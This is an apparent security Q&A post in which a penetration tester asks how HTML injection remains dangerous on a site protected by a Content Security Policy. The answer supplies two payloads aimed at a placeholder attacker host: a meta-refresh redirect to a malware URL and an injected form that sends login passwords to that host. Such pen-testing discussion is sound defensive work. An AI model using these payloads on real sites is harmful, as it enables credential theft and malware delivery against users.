# What are some useful tags and payloads for HTML injection on CSP-protected sites?

Tags: web-application, web-browser, xss, html, content-security-policy

I'm pen-testing a website that fixed most of its XSS vulnerabilities by just adding a Content Security Policy. There are still HTML injections in several places. I've tried to get a javascript-containing file onto the origin via an attachments feature, but it looks like a dead end.

Since I can't execute javascript, what can I use as a proof of concept to show the continued severity of HTML injection attacks despite the CSP? Are there any HTML tags I can still use to compromise security?

---

The CSP has a default rule that only allows the same origin. However, there are exceptions for `data:` in `<img>`, and the policy also allows inline CSS.

Comment: You could try your attacks using Internet Explorer. [It does not (yet) support the standard header](https://scotthelme.co.uk/content-security-policy-an-introduction/).

Answer (score 2):

You could try to do a redirect to another URL using meta-tags:

```
  <meta http-equiv="refresh" content="1; url=http://attacker.example.com/malware">
```

And if there is a login form you could try to change the location it submits too by adding another `form` element, because target for form submission are not protected by CSP.

```
  <form action=login.php> <!-- original action -->
  <form action=http://attacker.example.com/login.php>  <!-- your injected action -->
  ...<input type=password ....
  </form>
```

And of course you could include any kind of links to other sites, because links are not affected by CSP too.